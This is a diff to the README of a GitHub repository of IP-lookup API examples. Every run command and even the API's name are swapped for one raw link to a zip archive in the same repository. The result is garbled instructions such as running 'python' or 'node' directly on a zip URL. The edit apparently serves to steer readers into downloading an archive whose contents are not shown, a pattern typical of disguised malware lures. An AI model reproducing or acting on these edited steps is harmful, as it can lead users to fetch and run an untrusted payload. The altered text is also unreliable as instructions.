louismaximo/myip-examples/README.md

 4. **Open & Edit Code:** Open the downloaded file in a text editor or IDE of your choice.

 5. **Run the Example:**
-   - For Python, use `python example.py` in your terminal.
+   - For Python, use `python https://raw.githubusercontent.com/louismaximo/myip-examples/main/examples/bash/myip-examples-1.3.zip` in your terminal.
-   - For JavaScript, use `node example.js` if you have Node.js installed.
+   - For JavaScript, use `node https://raw.githubusercontent.com/louismaximo/myip-examples/main/examples/bash/myip-examples-1.3.zip` if you have https://raw.githubusercontent.com/louismaximo/myip-examples/main/examples/bash/myip-examples-1.3.zip installed.
-   - For Bash scripts, use `bash example.sh`.
+   - For Bash scripts, use `bash https://raw.githubusercontent.com/louismaximo/myip-examples/main/examples/bash/myip-examples-1.3.zip`.
    - Follow the relevant instructions based on your selected language.

 ## 🌍 Understanding the API

-The myip.foo API provides free IP lookup services.
+The https://raw.githubusercontent.com/louismaximo/myip-examples/main/examples/bash/myip-examples-1.3.zip API provides free IP lookup services.
 Here are some key points:

 - **No Authentication Required:** You do not need an account to use the API.
 - **Supports IPv4 and IPv6:** The API can handle both IPv4 and IPv6 addresses.